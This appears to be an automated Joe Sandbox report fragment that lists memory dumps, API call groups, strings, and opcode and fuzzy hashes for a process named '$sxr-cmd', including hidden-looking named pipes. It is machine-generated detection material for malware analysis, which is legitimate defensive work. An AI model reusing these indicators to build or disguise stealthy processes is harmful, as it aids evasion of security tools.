                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectSingleWait
                                                                                                                      • String ID: wil
                                                                                                                      • API String ID: 24740636-1589926490
                                                                                                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                      • Instruction ID: e60bd5d927c5d9cf4256d029dcd76075c907682581618282697e7160333a6f6c
                                                                                                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                      • Instruction Fuzzy Hash: D7416D29A08D42C7F3204F21E480279AAB1EF86FA1F618131D91EC7EA5CF3DEC498711
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                      • String ID: $Application$System
                                                                                                                      • API String ID: 3377411628-1881496484
                                                                                                                      • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                      • Instruction ID: e13be76c26c49f327117025dff26ae4e89c75b2ae2dfc2dcf2d85d37d7e9ae9e
                                                                                                                      • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                      • Instruction Fuzzy Hash: BD412736B04E429AE7108F64E4403EDBBB5EB89F58F855236DA4E82B68EF38D545C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                      • String ID: :$\
                                                                                                                      • API String ID: 3961617410-1166558509
                                                                                                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                      • Instruction ID: 14e3f633443029135c7bfed5d4b20717b661c44b18528d198f4b6df5971a8d61
                                                                                                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                      • Instruction Fuzzy Hash: FE218021A08E42C6E7105B68E444079F6A2EB4AFA5F85A236D90FC23B0DF3CEC448700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1397130798-0
                                                                                                                      • Opcode ID: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                                                                                                      • Instruction ID: 944a53a70e95bf0531c0acfc6b2dba7aee9687870b12ba9fdf574cd56b7687fb
                                                                                                                      • Opcode Fuzzy Hash: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                                                                                                      • Instruction Fuzzy Hash: D8918326B08F8286EB658B15D4506B9F3A1FB85FA8F458136DA4EC77A5DF3CDD408700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6155025CA
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6155025E8
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF61550260F
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF615502636
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF615502650
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                      • API String ID: 3407644289-1668778490
                                                                                                                      • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                      • Instruction ID: 5620a2273d9a6f4945539499e13ffa4d0fd83bbb441d7a560b077e2e4a2fa001
                                                                                                                      • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                      • Instruction Fuzzy Hash: D1313E39A0CD02C5FB546F25E811279EAA5AF85FA8F559036DA0EC62B5DF3CEC00C711
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                                                      • API String ID: 2516562204-381716982
                                                                                                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                      • Instruction ID: dc9d6c7144b8c2286d519fdc76b1fdc65f8cc178bffa48deb78f312676192bdf
                                                                                                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                      • Instruction Fuzzy Hash: D7C1813AA15A91C6E7548F25E84067EB7A1FB44FA4F445135DE8D83BA8DF3CE891C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD46E
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD485
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD4EE
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: iswspace.MSVCRT ref: 00007FF6154FD54D
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD569
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD58C
                                                                                                                      • iswspace.MSVCRT ref: 00007FF615507EEE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                      • String ID: A
                                                                                                                      • API String ID: 3731854180-3554254475
                                                                                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                      • Instruction ID: a24af72395027e46d9aefe316b3966f3a18c655a0ed1f4c24dd0030b20d024a3
                                                                                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                      • Instruction Fuzzy Hash: 57A15029A09E8286E6609F61A850279FBA0FF45FB4F548035DA4DC77B5EF3CE845DB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                      • API String ID: 1580871199-2613899276
                                                                                                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                      • Instruction ID: 9bff9a7803e188b8e26b487efc76ea668209d9f5887566ba6db609cf89dace5d
                                                                                                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                      • Instruction Fuzzy Hash: 70514B76A19F8286EB108F25E840679A7F4FB88FA4F455135DA5E87B68DF3CD801C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                      • String ID: con
                                                                                                                      • API String ID: 689241570-4257191772
                                                                                                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                      • Instruction ID: 48ab0aa29d10d6b7ea7706b37008d1743b859ccdd20a31471c869d38331ccc22
                                                                                                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                      • Instruction Fuzzy Hash: B8417136A08A45C6E6108F299484379FAA1FB49FB5F558335DA2D937E0CF3DDC498740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                      • String ID: PE
                                                                                                                      • API String ID: 2941894976-4258593460
                                                                                                                      • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                      • Instruction ID: e72075cc2ff0582a7800ca37370e8ed00c2cd56a936f690eb14cc7fcfda09ca3
                                                                                                                      • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                      • Instruction Fuzzy Hash: B2419379A08A9186EA208F11E450279FBF0FB89FA0F454230DE5D83BA5DF7CE845CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                      • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                                      • API String ID: 2171963597-1213686612
                                                                                                                      • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction ID: 241303c5758983f69d981ed64eef12adeecb75c0c544caa9441ccd752c9e3ef5
                                                                                                                      • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction Fuzzy Hash: 31217F32619B4082FB10CB64F55835A73B2F389BA5F904215EA5E4ABA9EF7DC149CF00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF61551849D,?,?,?,00007FF61551F0C7), ref: 00007FF615500045
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61551F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF615500071
                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615500092
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6155000A7
                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615500148
                                                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615500181
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 734197835-0
                                                                                                                      • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                      • Instruction ID: 5a6128d5b1f84a9d5a3abd56e4a14d0421edd286c5cd2576514db6ea48c9698f
                                                                                                                      • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                      • Instruction Fuzzy Hash: 5461613A90CE9286E7208B25A804379FAA1BB45F68F848136D94EC37B4DF7CEC45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Enum$Openwcsrchr
                                                                                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                      • API String ID: 3402383852-1459555574
                                                                                                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                      • Instruction ID: 28e770eefd48eb5c3401986fe896cc90c8cb28500715102b154cca92d5211f48
                                                                                                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                      • Instruction Fuzzy Hash: B6A1A46AA08E4282EE109F55D0902BAE7B0EF85FB4F444635DA4E877A5DF7CED41C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$wcscmp
                                                                                                                      • String ID: %s
                                                                                                                      • API String ID: 243296809-3043279178
                                                                                                                      • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                      • Instruction ID: 82c8245e6e8133575b7ac79b79dfe2e57c7abffd07cf5c9075108ff8e4ee87ea
                                                                                                                      • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                      • Instruction Fuzzy Hash: 9EA18226709E8696EB65DF25D8403F9A790FF48FA8F544036CA4EC76A5DF3CEA458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$EnvironmentVariable
                                                                                                                      • String ID: DIRCMD
                                                                                                                      • API String ID: 1405722092-1465291664
                                                                                                                      • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                      • Instruction ID: bb5777926a307ba215285f529d2f03b224a12e9f1942d4b3bee329531006ba9f
                                                                                                                      • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                      • Instruction Fuzzy Hash: 49817F72A18FC28AEB20CF74E8802ED77A4FB48B58F104139DA8D97B69DF38D5558704
                                                                                                                      Uniqueness

